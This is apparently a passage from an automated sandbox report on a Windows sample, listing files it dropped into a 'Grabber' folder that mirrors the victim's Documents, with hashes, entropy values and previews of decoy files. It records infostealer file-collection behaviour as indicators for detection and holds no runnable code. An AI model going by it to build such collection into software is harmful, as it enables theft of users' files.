                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):190
                                                            Entropy (8bit):3.5497401529130053
                                                            Encrypted:false
                                                            SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                            MD5:87A524A2F34307C674DBA10708585A5E
                                                            SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                            SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                            SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):3.514398793376306
                                                            Encrypted:false
                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                            MD5:29EAE335B77F438E05594D86A6CA22FF
                                                            SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                            SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                            SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):3.5218877566914193
                                                            Encrypted:false
                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
                                                            MD5:50A956778107A4272AAE83C86ECE77CB
                                                            SHA1:10BCE7EA45077C0BAAB055E0602EEF787DBA735E
                                                            SHA-256:B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
                                                            SHA-512:D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH.docx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696508269038202
                                                            Encrypted:false
                                                            SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                            MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                            SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                            SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                            SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                            Malicious:false
                                                            Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH\DUUDTUBZFW.xlsx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH\EIVQSAOTAQ.png

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692024230831571
                                                            Encrypted:false
                                                            SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                            MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                            SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                            SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                            SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                            Malicious:false
                                                            Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH\EOWRVPQCCS.pdf

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692990330209164
                                                            Encrypted:false
                                                            SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                            MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                            SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                            SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                            SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                            Malicious:false
                                                            Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH\PALRGUCVEH.docx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696508269038202
                                                            Encrypted:false
                                                            SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                            MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                            SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                            SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                            SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                            Malicious:false
                                                            Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH\ZGGKNSUKOP.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.xlsx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):402
                                                            Entropy (8bit):3.493087299556618
                                                            Encrypted:false
